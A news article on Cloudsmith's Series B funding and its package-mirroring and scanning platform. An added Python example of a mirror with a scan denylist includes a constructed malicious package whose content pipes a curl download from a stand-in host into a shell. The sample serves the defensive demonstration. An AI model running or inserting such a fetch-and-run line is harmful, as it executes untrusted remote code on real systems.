TechCrunch News, March 3
Cloudsmith raises $23M to improve software supply chain security

Cloudsmith is a Northern Ireland-based startup that addresses software supply chain security through its cloud-native "artifact management platform". The company recently raised a $23 million Series B round led by TCV to fund its next phase of growth. Cloudsmith's platform acts as a private registry, ensuring that binary artifacts remain available even if they change or disappear from their original sources. Cloudsmith also scans dependencies for vulnerabilities, licensing problems and malware, providing a security checkpoint before those packages are exposed to developers. The company plans to use the new funding to expand its sales, marketing and customer success teams and to invest in AI R&D that helps developers choose safer, higher-quality open-source packages.

🛡️ Cloudsmith's "artifact management platform" targets the security gaps common in software supply chains: by acting as a private registry it makes builds repeatable and reliable, and gives DevOps teams visibility into the artifacts used in their production software.

🔍 Cloudsmith scans open-source dependencies for vulnerabilities, licensing issues and malware, blocking potential risks before those packages enter the development environment and giving enterprises a clear overview of artifact usage.

💡 Cloudsmith plans to invest the new funding in AI R&D, analysing large volumes of package consumption data to give developers better-informed recommendations for open-source packages, such as suggesting more actively maintained or more widely adopted alternatives.

The software supply chain is notoriously porous: a reported 81% of codebases contain high- or critical-risk open source vulnerabilities. A single vulnerability can have a far-reaching impact on the wider software supply chain, as evidenced by the likes of the Log4Shell exploit that saw millions of applications exposed to potential remote code execution hacks via the Log4j logging library.

Northern Irish startup Cloudsmith is setting out to solve this exact problem with its cloud-native “artifact management platform,” which it touts as a more modern alternative to legacy software supply chain platforms such as JFrog or Sonatype.

To help drive its next phase of growth, the startup on Monday said it has raised $23 million in a Series B round of financing led by TCV, with participation from Insight Partners and some returning investors.

An “artifact,” in the context of Cloudsmith’s industry, refers to any software package, binary file or component that is created or distributed throughout the software development process. This could be libraries and their dependencies, configuration files, compiled applications, and more.

While a company will usually write its own code, it typically relies on third-party packages stored on public open-source registries. These packages are required at build-time (when the code is compiled into an executable format), but at that point, the package might have changed versions, or simply might not be available. This is where Cloudsmith enters the fray, serving “mirrors” of these packages.

“Cloudsmith serves as a private registry for these binary artifacts, so they’re always available for future builds, even if they change or disappear from their original sources,” Cloudsmith’s CEO Glenn Weinstein told TechCrunch. “Cloudsmith ensures builds are repeatable and reliable, and provides centralized DevOps or platform engineering teams with visibility into what’s going into their production software.”

But even if a package is still available in an open-source repository, it can develop security issues over time due to lack of maintenance, or for more nefarious reasons. This is why Cloudsmith scans dependencies for vulnerabilities, licensing issues, and malware before exposing these packages to developers in their coding environments.
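As an added illustration of the mirror-and-checkpoint model described above (example code written for this page, not Cloudsmith's own software or API): a toy in-memory mirror that pins the digest of each artifact on first fetch, keeps serving that pinned copy when the upstream index republishes or drops the version, and refuses to admit an artifact whose digest is on a constructed scan denylist.

```python
import hashlib
from dataclasses import dataclass, field

# Constructed stand-in for a public index: (name, version) -> package bytes.
UPSTREAM = {
    ("leftpad", "1.0.0"): b"def leftpad(s, n): return s.rjust(n)\n",
    ("evilpkg", "2.1.0"): b"import os; os.system('curl http://example.invalid | sh')\n",
}

def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

# Constructed scanner verdict keyed by digest; a real platform runs malware/vuln scans here.
BLOCKED_DIGESTS = {sha256(UPSTREAM[("evilpkg", "2.1.0")])}

@dataclass
class Mirror:
    store: dict = field(default_factory=dict)   # (name, version) -> bytes served to builds
    pins: dict = field(default_factory=dict)    # (name, version) -> digest seen on first fetch
    events: list = field(default_factory=list)  # audit trail a team could alert on

    def fetch(self, name, version, upstream):
        key = (name, version)
        if key in self.store:
            # Build reproducibility: serve the pinned copy whatever upstream does now.
            if key not in upstream:
                self.events.append(f"upstream-missing:{name}=={version}")
            elif sha256(upstream[key]) != self.pins[key]:
                self.events.append(f"drift:{name}=={version}")
            return self.store[key]
        if key not in upstream:
            raise LookupError(f"{name}=={version} is neither cached nor upstream")
        data, digest = upstream[key], sha256(upstream[key])
        if digest in BLOCKED_DIGESTS:       # security checkpoint before developers see it
            self.events.append(f"blocked:{name}=={version}")
            raise PermissionError(f"{name}=={version} failed policy scan")
        self.store[key], self.pins[key] = data, digest
        return data

def demo():
    m, up = Mirror(), dict(UPSTREAM)
    first = m.fetch("leftpad", "1.0.0", up)
    up[("leftpad", "1.0.0")] = b"republished under the same version\n"
    second = m.fetch("leftpad", "1.0.0", up)
    del up[("leftpad", "1.0.0")]            # upstream yanks the package entirely
    third = m.fetch("leftpad", "1.0.0", up)
    try:
        m.fetch("evilpkg", "2.1.0", up)
    except PermissionError:
        pass
    return first == second == third, m.events
```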

It’s worth noting that while Cloudsmith can support packages that its customers have developed in-house, the vast majority of artifacts stored on the platform are open-source packages from the usual indexes, including PyPi, Docker Hub, Maven Central, and Npmjs.

“All data and software flow through Cloudsmith, so Cloudsmith is a security checkpoint for open-source dependencies; it scans, curates, and blocks problematic artifacts before they reach production,” Weinstein said. “Cloudsmith also clears up a blind-spot many enterprises have in terms of clear oversight of what artifacts they use, whether private, public, or open-source.”

[Image: Cloudsmith. Image credits: Cloudsmith]

Founded in Belfast in 2016 by Alan Carson and CTO Lee Skillen, Cloudsmith had previously raised $26 million in a Series A round that started with $15 million in 2021 and finished with a further $11 million in 2023. The second tranche came shortly after Carson transitioned into the chief strategy officer role and Twilio chief customer officer Weinstein came in as CEO.

According to Carson, bringing in an experienced startup and scale-up entrepreneur enabled the two co-founders to focus more on the product “vision, roadmap and architecture,” while opening it to a wider array of enterprises and investors in the U.S. — including TCV and Insight Partners.

“These investors are a strong signal that Cloudsmith has shifted into category leadership,” Carson told TechCrunch over email. “Under Glenn’s leadership, Cloudsmith has pivoted squarely towards large enterprises and their challenges in controlling and securing their software supply chains, and in meeting rigorous compliance standards.”

Most of Cloudsmith’s 100 employees, including the two founders, are based in Belfast, but Weinstein says that around three-quarters of its revenue now comes from customers in the U.S.

With the fresh funding, Cloudsmith plans to hire across sales, marketing and customer success, as well as invest in R&D for new AI applications. Indeed, Weinstein said that it has a “unique opportunity” to transform vast banks of software package consumption data into “actionable insights” for developers.

“We want to help developers choose better, safer open-source packages,” Weinstein said. “We’ll do this by helping cybersecurity teams to create internal curated registries, where it’s easier for a developer to source a package from a curated internal repo than from a public registry.”

This will likely involve making recommendations, such as switching from a package that is rarely updated or is falling in popularity, to a similar package that other Cloudsmith customers have embraced.

“This is the advice developers rely on today, albeit informally — ‘hey, I heard about this package’ — and turn it into instantly available advice via the Cloudsmith platform,” Weinstein said.
